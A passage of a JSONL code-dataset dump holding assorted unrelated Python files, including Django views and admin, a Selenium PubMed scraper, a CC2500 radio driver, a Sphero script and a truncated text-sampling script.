)\n","sub_path":"tests/test_taar_utils.py","file_name":"test_taar_utils.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"641154290","text":"import environnement\r\nimport grille\r\n\r\n\"\"\"\r\nPetit programme de test de la classe Grille\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n noir = (0, 0, 0)\r\n rouge = (255, 0, 0)\r\n vert = (0, 255, 0)\r\n g = grille.Grille()\r\n p0 = environnement.Porte(vert, g)\r\n p1 = environnement.Porte(vert, g)\r\n p2 = environnement.Porte(vert, g)\r\n p3 = environnement.Porte(vert, g)\r\n v1 = environnement.Voyageur(rouge, [p0, p1], g)\r\n v2 = environnement.Voyageur(rouge, [p0, p1], g,0.5)\r\n v3 = environnement.Voyageur(rouge, [p2, p0, p3], g)\r\n listeVoyageurs = [v1, v2, v3]\r\n obs1 = environnement.Obstacle(noir, g)\r\n g.addObstacle([(0, 0), (5, 4), (5, 5), (6, 5), (9, 9), (8, 5), (9, 5), (10, 5), (11, 5)], obs1)\r\n g.addVoyageur((1, 1), v1)\r\n g.addVoyageur((2, 1), v2)\r\n g.addVoyageur((0, 9), v3)\r\n g.addPorte([(9, 3), (9, 4)], p0)\r\n g.addPorte([(7, 8), (7, 9)], p1)\r\n g.addPorte([(7, 5)], p2)\r\n g.addPorte([(11, 0)], p3)\r\n step = 0\r\n print(step)\r\n print(g)\r\n while list(filter(lambda v : v in g.getVoyageurs().values(),listeVoyageurs)) != []:\r\n step += 1\r\n g.deplacements()\r\n print(step)\r\n print(g)\r\n print(\"fini !\")","sub_path":"MouvementFoule/testGrille.py","file_name":"testGrille.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"351314723","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView#class_based_view 汎用ビュー\n\nfrom .models import *\n\nfrom .forms import PostForm\n\n\n# Create your views here.\n\ndef index(request):\n memos = Memo.objects.all()\n params = {\n 'memos': memos\n }\n return render(request, 'index.html', params)#renderメソッドの第三引数に変数(辞書型)を入れることで、templateのhtmlファイルに使う変数を渡せる\n\n\ndef post(request):\n form = PostForm(request.POST, instance=Memo())\n if form.is_valid(): #validateで検証という英単語だから、formの内容が有効かどうかを観察するためのis_valid\n form.save() #formの保存\n else:\n print(form.errors)\n\n return redirect(to='/')\n\n","sub_path":"django_dotpro/django_app/memo_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"132264824","text":"from django.contrib import admin\nfrom .models import Car, Insurance, Tax, TechnicalCheckIn, Service\n\n\nclass CarAdmin(admin.ModelAdmin):\n list_display = ['name',\n 'firm',\n 'power',\n 'cylinder',\n 'fuel_consumption',\n 'fuel_type',\n 'registration_number',\n 'chassis']\n\n\nadmin.site.register(Car, CarAdmin)\n\n\nclass InsuranceAdmin(admin.ModelAdmin):\n list_display = ['insurance_company',\n 'vehicle',\n 'policy_number',\n 'activation_date',\n 'expiration_date',\n 'prime']\n\n\nadmin.site.register(Insurance, InsuranceAdmin)\n\n\nclass TaxAdmin(admin.ModelAdmin):\n list_display = ['vehicle',\n 'tax_amount',\n 'date_of_tax_payment',\n 'next_due_date',]\n\n\nadmin.site.register(Tax, TaxAdmin)\n\n\nclass TechnicalCheckInAdmin(admin.ModelAdmin):\n list_display = ['vehicle',\n 'check_in_number',\n 'comment',\n 'date_of_checkIn',\n 'date_of_next_checkIn',\n 'cost_of_checkIn']\n\n\nadmin.site.register(TechnicalCheckIn, TechnicalCheckInAdmin)\n\n\nclass ServiceAdmin(admin.ModelAdmin):\n list_display = ['vehicle',\n 'service_supplier',\n 'order_id',\n 'category',\n 'date_of_service',\n 'next_date',\n 'cost_of_service',\n 'cost_of_parts']\n\n\nadmin.site.register(Service, ServiceAdmin)\n\n\n\n\n","sub_path":"fleet/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"240407851","text":"# Website we want to scrape is: https://www.verizonwireless.com/smartphones/samsung-galaxy-s7/\n# The documentatio of selenium is here: http://selenium-python.readthedocs.io/index.html\n\n# Please follow the instructions below to setup the environment of selenium\n# Step #1\n# Windows users: download the chromedriver from here: https://chromedriver.storage.googleapis.com/index.html?path=2.30/\n# Mac users: Install homebrew: http://brew.sh/\n#\t\t\t Then run 'brew install chromedriver' on the terminal\n#\n# Step #2\n# Windows users: open Anaconda prompt and switch to python3 environment. Then run 'conda install -c conda-forge selenium'\n# Mac users: open Terminal and switch to python3 environment. Then run 'conda install selenium'\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport csv\n\n# Windows users need to specify the path to chrome driver you just downloaded.\n# driver = webdriver.Chrome('path\\to\\where\\you\\download\\the\\chromedriver')\n\ndriver = webdriver.Chrome()\n# input the search condition\nsearch1 = \"(((cancer[Title/Abstract]) AND \\\"journal article\\\"[Publication Type]) AND \\\n(\\\"2000\\\"[Date - Publication] : \\\"3000\\\"[Date - Publication])) AND mutation[Title/Abstract]\"\n\nsearch2 = \"((cancer[Title/Abstract] AND gene[Title/Abstract] AND mutation[Title/Abstract]) AND \\\n(\\\"2000\\\"[Date - Publication] : \\\"3000\\\"[Date - Publication]))\" \n\n# add to the search engineer\nurl = \"https://www.ncbi.nlm.nih.gov/pubmed/?term=\" + search2\ndriver.get(url)\n\n# driver.find_elements_by_xpath(\".//input[@type='radio' and @value='SRF']\")[0].click\ncsv_file = open('pubmed.csv', 'w')\nwriter = csv.writer(csv_file)\nwriter.writerow(['pmid', 'title', 'author', 'journal', 'form'])\n# need to add abstract and key word before scraping the pages\n\n# Page index used to keep track of where we are.\nindex = 1\nwhile index < 3: # True\n\ttry:\n\t\tprint(\"Scraping Page number \" + str(index))\n\t\tindex = index + 1\n\t\t# Find the device name\n\t\t# Check the documentation here: http://selenium-python.readthedocs.io/locating-elements.html\n\n\t\t# Find all the reviews. The find_elements function will return a list of selenium select elements.\n\t\treviews = driver.find_elements_by_xpath('//*[@class=\"rprt\"]')\n\n\t\tprint('=' * 50)\n\t\tprint(len(reviews))\n\t\tprint(reviews[0])\n\t\tprint('=' * 50)\n\n\n\n\t\t# To test the xpath, you can comment out the following code in the try statement and print the length of reviews.\n\t\t# Iterate through the list and find the details of each review.\n\t\tfor review in reviews:\n\t\t\t# Initialize an empty dictionary for each review\n\t\t\treview_dict = {}\n\t\t\t\n\t\t\t# Use Xpath to locate the title, content, username, date.\n\t\t\t# Once you locate the element, you can use 'element.text' to return its string.\n\t\t\t# To get the attribute instead of the text of each element, use 'element.get_attribute()'\n\n\n\t\t\t#title = review.find_element_by_xpath('.//div[@class=\"bv-content-title-container\"]//h4').text\n\n\t\t\tpmid = review.find_element_by_xpath('.//*[@class=\"rprtid\"]/dd').text\n\t\t\ttitle = review.find_element_by_xpath('.//*[@class=\"title\"]/a').text\n\t\t\tauthor = review.find_element_by_xpath('.//*[@class=\"desc\"]').text\n\t\t\tjournal = review.find_element_by_xpath('.//*[@class=\"details\"]/span').text\n\t\t\tform = review.find_element_by_xpath('.//*[@class=\"details\"]/span').get_attribute(\"class\")\n\t\t\tlink = 'https://www.ncbi.nlm.nih.gov/pubmed/' + pmid\n\n\t\t\treview_dict['pmid'] = pmid\n\t\t\treview_dict['title'] = title\t\n\t\t\treview_dict['author'] = author\t\n\t\t\treview_dict['journal'] = journal\t\n\t\t\treview_dict['form'] = form\n\t\t\treview_dict['link'] = link\n\n\t\t\twriter.writerow(review_dict.values())\t\n\t\t\t\n\n\t\t\t# Your code here\n\n\t\t# Locate the next button on the page. Then call 'button.click()' to really click it.\n\t\tbutton = driver.find_element_by_xpath('.//*[@class=\"active page_link next\"]')\n\t\tbutton.click()\n\t\ttime.sleep(10)\n\n\n\n\texcept Exception as e:\n\t\tprint(e)\n\t\tdriver.close()\n\t\tbreak\n","sub_path":"data_selenium/pubmed/pubmed_final_title.py","file_name":"pubmed_final_title.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"29419703","text":"# coding: utf-8\ndef get_generic_list_view():\n return [\n {\n 'field_label': u'UUID',\n 'field_name': 'uuid',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Last update:',\n 'field_name': 'updated_at',\n 'field_type': 'date_time'\n },\n {\n 'field_label': u'Deleted?',\n 'field_name': 'is_deleted',\n 'field_type': 'boolean'\n },\n {\n 'field_label': u'Process completed?',\n 'field_name': 'process_completed',\n 'field_type': 'boolean'\n },\n {\n 'field_label': u'Must reprocess?',\n 'field_name': 'must_reprocess',\n 'field_type': 'boolean'\n },\n ]\n\n\ndef get_log_columns_list_view():\n return [\n {\n 'field_label': u'Timestamp',\n 'field_name': 'time',\n 'field_type': 'date_time'\n },\n {\n 'field_label': u'Name',\n 'field_name': 'name',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Function',\n 'field_name': 'funcName',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Message',\n 'field_name': 'message',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Line',\n 'field_name': 'lineno',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Level',\n 'field_name': 'levelname',\n 'field_type': 'string'\n },\n ]\n\n\ndef get_log_filters_list_view():\n return [\n {\n 'field_label': u'Timestamp',\n 'field_name': 'time',\n 'field_type': 'date_time'\n },\n {\n 'field_label': u'Name',\n 'field_name': 'name',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Function',\n 'field_name': 'funcName',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Message',\n 'field_name': 'message',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Level',\n 'field_name': 'levelname',\n 'field_type': 'choices',\n 'field_options': (\n ('DEBUG', 'DEBUG'),\n ('INFO', 'INFO'),\n ('WARNING', 'WARNING'),\n ('ERROR', 'ERROR'),\n ('CRITICAL', 'CRITICAL'),\n )\n },\n ]\n\n\ndef get_collection_list_view():\n list = get_generic_list_view()\n\n list.insert(1, {\n 'field_label': u'Acrônimo',\n 'field_name': 'acronym',\n 'field_type': 'string'\n })\n\n list.insert(2, {\n 'field_label': u'Nome',\n 'field_name': 'name',\n 'field_type': 'string'\n })\n return list\n\n\ndef get_journal_list_view():\n list = get_generic_list_view()\n\n list.insert(1, {\n 'field_label': u'ISSN',\n 'field_name': 'code',\n 'field_type': 'string'\n })\n return list\n\n\ndef get_issue_list_view():\n list = get_generic_list_view()\n\n list.insert(1, {\n 'field_label': u'PID',\n 'field_name': 'code',\n 'field_type': 'string'\n })\n return list\n\n\ndef get_article_list_view():\n list = get_generic_list_view()\n\n list.insert(1, {\n 'field_label': u'PID',\n 'field_name': 'code',\n 'field_type': 'string'\n })\n return list\n\n\ndef get_press_release_list_view():\n return get_generic_list_view()\n","sub_path":"opac_proc/web/helpers/list_generator.py","file_name":"list_generator.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"500037181","text":"\"\"\"Product class.\"\"\"\n\n\nclass Product:\n def __init__(self, name=\"\", price=0.0, is_on_sale=False):\n self.name = name\n self.price = price\n self.is_on_sale = is_on_sale\n\n def __str__(self):\n on_sale_string = \"\"\n if self.is_on_sale:\n on_sale_string = \" (on sale!)\"\n return \"{} ${:.2f}{}\".format(self.name, self.price, on_sale_string)\n\n def __repr__(self):\n return str(self)\n\n\nif __name__ == '__main__':\n print(\"I'm in product.py\")\n products = [Product(\"Phone\", 340, False), Product(\"PC\", 1420.95, True), Product(\"Plant\", 24.5, True)]\n on_sale_products = [product for product in products if product.is_on_sale]\n print(on_sale_products)\n","sub_path":"week_067/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"593033067","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.forms import (\n TextInput,\n CharField,\n HiddenInput,\n Textarea)\n\nfrom django.core.exceptions import ValidationError\n\nfrom availableworks.core.forms import AWBaseModelForm\nfrom availableworks.core.widgets import CustomSelectWidget\nfrom availableworks.core.models.work import Work\n\n\nclass AccountAddWorkForm(AWBaseModelForm):\n\n class Meta:\n model = Work\n\n fields = (\n 'owner',\n 'title',\n 'original_artist',\n 'primary_category',\n 'secondary_category',\n 'width',\n 'length',\n 'depth',\n 'weight',\n 'signed',\n 'year_created',\n 'total_stock',\n 'price',\n 'description',\n 'shipping_area',\n 'handling_time',\n 'domestic_shipping_cost_est',\n 'intl_shipping_cost_est',\n 'is_retrievable')\n\n labels = {\n 'primary_category': 'Primary Medium',\n 'total_stock': 'Quantity You\\'ll Sell',\n 'is_retrievable': 'Buyer(s) Can Pick Up',\n 'price': 'Item Price (USD)'}\n\n help_texts = {\n 'title': '150 characters left',\n 'original_artist': '80 characters left',\n 'secondary_category': 'Optional 2nd Medium',\n 'width': 'Width',\n 'length': 'Length',\n 'depth': 'Depth',\n 'year_created': 'Example: 2004',\n 'total_stock': 'Example: 3, must be 1 or greater.',\n 'price': 'Example: 45.00 (include cents)',\n 'description': '300 characters remaining',\n 'shipping_area': 'Where will you send it?',\n 'handling_time': 'Handling time needed?',\n 'domestic_shipping_cost_est': 'Domestic',\n 'intl_shipping_cost_est': 'International',\n 'is_retrievable': 'If marked \"Yes\", you will need to message the buyer your address.'}\n\n widgets = {\n 'owner': HiddenInput,\n 'primary_category': CustomSelectWidget,\n 'secondary_category': CustomSelectWidget,\n 'width': TextInput,\n 'length': TextInput,\n 'depth': TextInput,\n 'weight': TextInput,\n 'signed': CustomSelectWidget,\n 'year_created': TextInput,\n 'total_stock': TextInput,\n 'price': TextInput,\n 'shipping_area': CustomSelectWidget,\n 'handling_time': CustomSelectWidget,\n 'domestic_shipping_cost_est': TextInput,\n 'intl_shipping_cost_est': TextInput,\n 'is_retrievable': CustomSelectWidget}\n\n def clean(self):\n cleaned = super(AWBaseModelForm, self).clean()\n\n if cleaned['shipping_area'] == Work.SHIPPING_AREA_GLOBAL:\n if not cleaned['intl_shipping_cost_est']:\n self._errors['intl_shipping_cost_est'] = self.error_class(['Required outside US.'])\n\n return cleaned\n\nclass AccountEditWorkForm(AccountAddWorkForm):\n pass\n","sub_path":"availableworks/account/forms/works.py","file_name":"works.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"649985842","text":"from registers import *\nfrom config import DEFAULT_CONFIG, DEFAULT_PA_TABLE\nfrom time import sleep\nfrom packets import AckPacket\nfrom packets import CounterPacket\nimport time\n\nSTATE_MASK = 0b01110000\nCHIP_RDY_MASK = 0b10000000\nFIFO_MASK = 0b00001111\n\nclass State(Enum):\n IDLE = 0b0000000\n RX = 0b0010000\n TX = 0b0100000\n FSTXON = 0b0110000\n CALIBRATE = 0b1000000\n SETTLING = 0b1010000\n RXFIFO_OVERFLOW = 0b1100000\n TXFIFO_UNDERFLOW = 0b1110000\n\nclass StatusByte(object):\n def __init__(self, status_byte):\n self.chip_ready = not (status_byte & CHIP_RDY_MASK == 0b10000000)\n self.state = State(status_byte & STATE_MASK)\n self.fifo = status_byte & FIFO_MASK\n\n def __str__(self):\n s = \"\"\n if (not self.chip_ready):\n s = \"CHIP NOT READY, \"\n s = s + \"State:\" + self.state.name\n s = s + \" Nr byte: >= \" + str(self.fifo)\n return s\n\ndef wreg(spi, reg: Register , val: int) -> StatusByte:\n \"\"\"\n Write via ``spi'' interface the value ``val'' into register with address ``reg''.\n\n Parameters\n ----------\n spi : spi object\n reg : register address\n val : value\n\n Returns\n -------\n out : state\n \"\"\"\n return StatusByte(spi.xfer2([reg.value, val])[-1])\n\ndef rreg(spi, reg: Register):\n \"\"\"\n Read register with address ``reg'' via ``spi'' interface.\n\n Parameters\n ----------\n spi : spi object\n reg: register address\n\n Returns\n -------\n out : register value\n\n \"\"\"\n # First byte contains the status byte while the second the register value\n # ([1]).\n return spi.xfer2([reg.value + Offset.READ_SINGLE.value, 0])[1]\n\ndef init(spi, cfg=DEFAULT_CONFIG, pa=DEFAULT_PA_TABLE) -> StatusByte:\n _ = reset(spi)\n _ = config(spi, cfg, pa)\n _ = flush_rx(spi)\n _ = flush_tx(spi)\n return status(spi)\n\ndef reset(spi) -> StatusByte:\n return StatusByte(spi.xfer2([Strobe.SRES.value])[0])\n\ndef config(spi, cfg=DEFAULT_CONFIG, pa=DEFAULT_PA_TABLE) -> StatusByte:\n _ = config_regs(spi)\n _ = config_pa_table(spi)\n return status(spi)\n\n\n\n\n\ndef config_regs(spi, cfg=DEFAULT_CONFIG) -> StatusByte:\n return StatusByte(spi.xfer2([x for k, v in cfg.items() for x in [k.value, v]])[-1])\n\ndef config_pa_table(spi, pa=DEFAULT_PA_TABLE) -> StatusByte:\n return StatusByte(spi.xfer2([Special.PATABLE.value + Offset.WRITE_BURST.value]\n + pa)[-1])\n\ndef status(spi) -> StatusByte:\n return StatusByte(spi.xfer2([Strobe.SNOP.value\n + Offset.READ_SINGLE.value])[0])\n\n\ndef status_tx(spi) -> StatusByte:\n return StatusByte(spi.xfer2([Strobe.SNOP.value + Offset.WRITE_SINGLE.value])[0])\n################################################################################\n# Strobe\n\ndef send_strobe(spi, cmd: Command) -> StatusByte:\n return StatusByte(spi.xfer2([cmd.value])[0])\n\ndef set_rx(spi) -> StatusByte:\n return send_strobe(spi, Strobe.SRX)\n\ndef set_tx(spi) -> StatusByte:\n return send_strobe(spi, Strobe.STX)\n\ndef set_idle(spi) -> StatusByte:\n return send_strobe(spi, Strobe.SIDLE)\n\ndef flush_rx(spi) -> StatusByte:\n return send_strobe(spi, Strobe.SFRX)\n\ndef flush_tx(spi) -> StatusByte:\n return send_strobe(spi, Strobe.SFTX)\n\ndef isRX(spi) -> bool:\n return status(spi).state == State.RX\n\ndef isTX(spi) -> bool:\n return status(spi).state == State.TX\n\ndef rssi(spi) -> int:\n rssi = rreg(spi, Status.RSSI)\n if (rssi >= 128):\n rssi = rssi - 256\n return rssi // 2 - 70\n\ndef enter_rx_mode(spi):\n while not isRX(spi):\n set_rx(spi)\n\ndef enter_tx_mode(spi):\n while not isTX(spi):\n set_tx(spi)\n\n\ndef tx_fifo_byte_count(spi):\n return spi.xfer2([0xFA, 0x00])[-1] \n\ndef rx_fifo_byte_count(spi):\n return spi.xfer2([0xFB, 0x00])[-1]\n\n\n###########################################################################\n# Transmission and reception.\n\ndef tx_data2fifo(spi, data):\n #map(lambda x: spi.xfer2([Special.FIFO.value, x]) ,data)\n return StatusByte(spi.xfer2([Special.FIFO.value\n + Offset.WRITE_BURST.value]\n + data)[-1])\n\n\n\n\ndef set_inf_pkt_mode(spi):\n pktctrl0_setting = rreg(spi, Config.PKTCTRL0)\n wreg(spi, Config.PKTCTRL0, ((pktctrl0_setting & 0xFC) | 0x02))\n #wreg(spi, Config.PKTCTRL0, 0x04)\n wreg(spi, Config.PKTCTRL1, 0x04)\n \ndef set_fix_pkt_mode(spi):\n pktctrl0_setting = rreg(spi, Config.PKTCTRL0)\n wreg(spi, Config.PKTCTRL0, (pktctrl0_setting & 0xFC))\n \n\ndef set_pkt_len(spi, length):\n wreg(spi, Config.PKTLEN, length)\n\n\n\n\ndef tx_sync_infinite(spi, pkt) -> bool: \n pkt_size = len(pkt) \n print(\"pkt size:\", pkt_size)\n print(\"mod:\", pkt_size % 256)\n\n flush_tx(spi);\n set_inf_pkt_mode(spi)\n set_pkt_len(spi, pkt_size % 256)\n \n \n \n bytes_sent = 0\n\n\n while len(pkt) > 255:\n while tx_fifo_byte_count(spi) > 2:\n sleep(0.0001)\n\n tx_data2fifo(spi, pkt[:30])\n \n enter_tx_mode(spi)\n \n pkt = pkt[30:] \n bytes_sent += 30\n while tx_fifo_byte_count(spi) > 2:\n sleep(0.0001)\n wreg(spi, Config.PKTCTRL0, 0x00)\n\n while len(pkt):\n while tx_fifo_byte_count(spi) > 2:\n sleep(0.0001)\n\n tx_data2fifo(spi, pkt[:30])\n pkt = pkt[30:]\n enter_tx_mode(spi)\n bytes_sent += len(pkt)\n \n while isTX(spi):\n sleep(0.0001)\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\ndef tx_sync(spi, gpio, pin, data) -> bool:\n wreg(spi, Config.PKTCTRL0, 0x05)\n wreg(spi, Config.PKTCTRL1, 0x08)\n\n t_poll = .001\n _ = set_idle(spi)\n _ = flush_tx(spi)\n sleep(.1)\n _ = tx_data2fifo(spi, data)\n enter_tx_mode(spi)\n\n # Wait for SYNC signal\n while gpio.input(pin) == 0:\n sleep(t_poll)\n while gpio.input(pin):\n sleep(t_poll)\n print(\"TRANSMITTED!\")\n return status(spi)\n\n\ndef rx_sync_counter(spi, gpio, pin, time_threshold):\n wreg(spi, Config.PKTCTRL0, 0x05)\n wreg(spi, Config.PKTCTRL1, 0x08)\n return rx_sync(spi, gpio, pin, CounterPacket.LENGTH.value, time_threshold)\n\ndef rx_sync_ack(spi, gpio, pin, time_threshold):\n wreg(spi, Config.PKTCTRL0, 0x05)\n wreg(spi, Config.PKTCTRL1, 0x08)\n return rx_sync(spi, gpio, pin, AckPacket.LENGTH.value, time_threshold)\n\ndef rx_fifo2data(spi, n):\n return spi.xfer2([Special.FIFO.value + Offset.READ_BURST.value] + ([0] * (n)))\n\ndef rx_sync_infinite(spi, gpio, pin, time_threshold):\n payload = []\n passed_time = 0\n set_inf_pkt_mode(spi)\n enter_rx_mode(spi)\n while gpio.input(pin) == 0:\n sleep(.001)\n passed_time += .001\n if passed_time >= time_threshold:\n print(\"timeout\")\n set_idle(spi)\n return -1\n while rx_fifo_byte_count(spi) > 4:\n sleep(0.0005)\n\n payload_len = rxfifo2data(spi, 2)\n address = rxfifo2data(spi, 1)\n pkt_type = rxfifo2data(spi, 1)\n\n bytes_left = payload_len\n \n set_pkt_len(spi, (payload_len + 4) % 256)\n\n while bytes_left > 255:\n while rx_fifo_byte_count() < 30:\n sleep(0.0005)\n\n rx_bytes_avail = rx_fifo_byte_count() - 1\n payload += rxfifo2data(spi, rx_bytes_avail)\n bytes_left -= rx_bytes_avail\n\n\n \n set_fix_pkt_mode(spi)\n \n while (bytes_left > 30):\n while rx_fifo_byte_count() < 30:\n sleep(0.0005)\n \n rx_bytes_avail = rx_fifo_byte_count() - 1\n payload += rxfifo2data(spi, rx_bytes_avail)\n bytes_left -= rx_bytes_avail\n\n while rx_fifo_byte_count() < bytes_left:\n sleep(0.0005)\n\n\n payload += rxfifo2data(spi, bytes_left)\n\n while rx_fifo_byte_count() < 2:\n sleep(0.0005)\n\n \n status_byte1 = rxfifo2data(spi, 1)\n status_byte2 = rxfifo2data(spi, 1)\n\n while(1):\n print(\"Done!\")\n sleep(1)\n\n\n\n\n\ndef rx_sync(spi, gpio, pin, n, time_threshold):\n passed_time = 0 \n enter_rx_mode(spi)\n while gpio.input(pin) == 0:\n sleep(.001)\n passed_time += .001\n if passed_time >= time_threshold:\n print(\"timeout\")\n _ = set_idle(spi)\n _ = flush_rx(spi)\n return -1\n \n while gpio.input(pin) != 0:\n sleep(.001)\n \n if rx_fifo_byte_count(spi) == 0: #CRC check failed\n #print(\"crc failed!\")\n return -1\n data = rx_fifo2data(spi, n)\n while isRX(spi):\n sleep(0.001)\n _ = set_idle(spi)\n _ = flush_rx(spi)\n return data[1:]\n\n","sub_path":"edge/cc2500/cc2500.py","file_name":"cc2500.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"17894312","text":"import logging\nfrom smtplib import SMTPException\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.http import HttpRequest\nfrom django.urls import reverse\n\nfrom voseq.celery import app\n\nlog = logging.getLogger(__name__)\n\n\n@app.task\ndef log_email_error(\n request: HttpRequest, exc: str, traceback: str, task_id: str\n) -> None:\n log.error(\n f\"log_email_error\\n--\\n\\nrequest {request} \\n\\nexc {exc}\"\n f\"\\n\\ntraceback {traceback}\"\n )\n\n\n@app.task\ndef notify_user(dataset_obj_id, user_id) -> None:\n \"\"\"Send an email notification to user\n\n If the gui_user is specified, we will send the notification to the person\n that is doing actions via the GUI. Otherwise, we will notify the user that\n created the ContactJob.\n \"\"\"\n user = User.objects.get(id=user_id)\n log.debug(f\"notify_user {dataset_obj_id}\")\n\n subject = f\"Dataset creation completed - {dataset_obj_id}\"\n relative_url = reverse('create_dataset.results', args=(dataset_obj_id,))\n result_url = \"http://voseq.com\" + relative_url\n content = \"Your dataset has successfully completed. \" \\\n \"Please verify and download the results from: \" \\\n f\"{result_url}\"\n from_email = 'noreply@voseq.com'\n\n if user and user.email:\n to_emails = [user.email] + [email for name, email in settings.ADMINS]\n try:\n send_mail(subject, content, from_email, to_emails)\n except SMTPException:\n log.exception(\"Failed to notify_user for dataset \" + str(dataset_obj_id))\n else:\n log.debug(\"sent dataset status email to \" + str(to_emails))\n else:\n log.debug('Cannot send notification email. '\n 'No user / email assigned to job ' + str(dataset_obj_id))","sub_path":"public_interface/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"538676465","text":"import sphero\nfrom time import sleep\n\nourSphero = sphero.Sphero()\nourSphero.connect()\nsleep(0.5)\nourSphero.set_rgb(0,0,0)\n\nheading = 0\ncolor = [255,0,0]\n\ndef switchcolor(color):\n return [color[2],color[0],color[1]]\n\ndef switchheading(heading):\n heading += 90\n return heading % 360\n\nfor i in range(1,10):\n ourSphero.roll(50,heading,10)\n for j in range(1,3):\n sleep(1)\n ourSphero.set_rgb(color[0],color[1],color[2])\n color = switchcolor(color)\n heading = switchheading(heading)","sub_path":"firstSpheroApp.py","file_name":"firstSpheroApp.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"345649994","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport locale\nos.environ[\"PYTHONIOENCODING\"] = \"utf-8\"\n# myLocale=locale.setlocale(category=locale.LC_ALL, locale=\"en_GB.UTF-8\")\nimport sys\nimport time\nimport torch\nprint('Checking CUDA status:')\nprint(torch.cuda.is_available())\nif torch.cuda.is_available():\n\tprint(torch.cuda.current_device())\n\tprint(torch.cuda.device(0))\n\tprint(torch.cuda.device_count())\n\tprint(torch.cuda.get_device_name(0))\n\nimport numpy as np\nfrom reader import dataset_str\nfrom config import config\nimport csv\nconfig=config()\nimport os \n# os.environ['CUDA_VISIBLE_DEVICES']=config.GPU\nnp.random.seed(config.seed)\n\nfrom utils import choose_action, similarity, similarity_batch, normalize, sample_from_candidate, just_acc, \\\n\tget_sample_positions, mask_sentence, generate_candidate_input_with_mask, MASK_IDX, PAD_IDX, bert_scorer, \\\n\tgpt2_scorer, tokenizer, ConstraintSearch, penalty_constraint, get_sentiment_score, \\\n\tget_batch_sentiment_scores, reverse_label\n\ndef_sent_scorer = bert_scorer.sent_score\nsentiment = 'positive'\n\ndef main():\n\tif os.path.exists(config.use_output_path):\n\t\tos.system('rm ' + config.use_output_path)\n\twith open(config.use_output_path, 'a') as g:\n\t\tg.write(str(config) + '\\n\\n')\n\t# for item in config.record_time:\n\t# \tif os.path.exists(config.use_output_path + str(item)):\n\t# \t\tos.system('rm ' + config.use_output_path + str(item))\n\t#CGMH sampling for paraphrase\n\tsim=config.sim\n\t# sta_vec=list(np.zeros([config.num_steps-1]))\n\tconfig.shuffle=False\n\t#original sentence input\n\tuse_data = dataset_str(config.use_data_path)\n\tconfig.batch_size=1\n\tstep_size = config.step_size\n\n\tstart_time = time.time()\n\tproposal_cnt = 0\n\taccept_cnt = 0\n\tall_samples = []\n\tall_acc_samples = []\n\tall_chosen_samples = []\n\tfor sen_id in range(use_data.length):\n\t\tsent_ids = use_data.token_ids[sen_id]\n\t\tkeys = use_data.keys[sen_id]\n\t\tsearcher = ConstraintSearch(keys)\n\t\tsequence_length = len(sent_ids)\n\t\t#generate for each sentence\n\t\tsta_vec = np.zeros(sequence_length)\n\t\tinput_ids = np.array(sent_ids)\n\t\tinput_original = use_data.tokens[sen_id]\n\t\tprev_inds = []\n\t\told_prob = def_sent_scorer(tokenizer.decode(input_ids))\n\t\told_prob *= penalty_constraint(searcher.count_unsafisfied_constraint(searcher.sent2tag(input_ids)))\n\t\tif config.mode == 'sentiment':\n\t\t\told_prob *= get_sentiment_score(input_ids, sentiment)\n\t\tif sim != None:\n\t\t\told_prob *= similarity(input_ids, input_original, sta_vec)\n\n\t\toutputs = []\n\t\toutput_p = []\n\t\tfor iter in range(config.sample_time):\n\t\t\t# if iter in config.record_time:\n\t\t\t# \twith open(config.use_output_path, 'a', encoding='utf-8') as g:\n\t\t\t# \t\tg.write(bert_scorer.tokenizer.decode(input_ids)+'\\n')\n\t\t\t# print(bert_scorer.tokenizer.decode(input_ids).encode('utf8', errors='ignore'))\n\t\t\tpos_set = get_sample_positions(sequence_length, prev_inds, step_size)\n\t\t\taction_set = [choose_action(config.action_prob) for i in range(len(pos_set))]\n\t\t\t# if not check_constraint(input_ids):\n\t\t\t# \tif 0 not in 